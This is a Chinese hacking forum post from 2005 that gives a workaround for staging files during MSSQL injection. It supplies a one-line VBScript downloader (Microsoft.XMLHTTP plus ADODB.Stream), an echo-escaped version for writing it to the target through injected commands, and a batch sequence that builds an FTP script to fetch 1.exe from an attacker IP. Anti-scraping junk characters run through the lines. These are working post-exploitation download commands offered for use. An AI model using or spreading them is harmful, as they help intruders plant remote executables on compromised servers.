QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2675|回复: 0
打印 上一主题 下一主题

mssql注射时不可以多次echo的解决办法

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:30 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
<>解决办法:
8 x$ i1 D' Y7 M6 ?1.iget.vbs一次写入 9 b1 z; y  o9 u  S0 `: G6 d
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 $ Z3 }' [3 f' d% Q' k
5 J, J- J# I  b' d& M% r
Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
0 m- b% C8 Y$ {4 e& \* A8 S6 q7 s# r! q$ t7 p7 h1 J) U
这样我们可以一次echo成功,echo版本:
) Q! l6 E; L+ g* @$ ]9 T  [
* o3 R" Y9 u6 a4 ]; Yecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs 7 h# W: B" M" K5 a- i3 S4 u& w9 m$ F
. k' l/ t6 D* X
+ s/ E- g) O! S4 v7 W! A
2.bat调用ftp脚本的写法(by envymask) - L) R( R7 ]: ]' y: q- i

- B& \  [- \1 |8 `7 u% C/ L: Kecho ftp&gt;1.vbs
" I0 W* P$ S5 j/ Becho open ip&gt;2.vbs
$ ]0 k" P8 N  Yecho u&gt;3.vbs 7 n; j) S8 o) w  ]" X2 y5 d9 U/ e$ A
echo s&gt;4.vbs # e1 i9 l8 M9 d  b' L9 c
echo binary&gt;5.vbs 4 U9 ]) ]( q5 a! C! r) P
echo get 1.exe&gt;6.vbs
$ h5 ^6 ^" a1 e+ ?echo bay&gt;7.vbs
. E# j/ p& j1 b/ T
+ i$ a5 w% m* u% t1 F1 i3 Scopy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs ' z& c3 @# f8 U% U( a
</P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2025-9-9 01:23 , Processed in 0.816512 second(s), 51 queries .

回顶部